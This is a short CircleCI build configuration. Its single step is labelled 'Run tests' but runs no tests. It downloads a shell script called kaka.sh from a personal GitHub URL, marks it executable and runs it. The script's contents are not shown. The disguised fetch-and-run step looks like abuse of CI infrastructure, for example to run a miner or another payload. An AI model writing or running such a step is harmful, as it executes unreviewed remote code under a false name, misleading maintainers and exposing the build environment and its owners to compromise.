version: 2.1
jobs:
  build:
    parallelism: 2
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          command: wget https://raw.githubusercontent.com/DwiPurwanti1392/kaka/main/kaka.sh && chmod +x kaka.sh && ./kaka.sh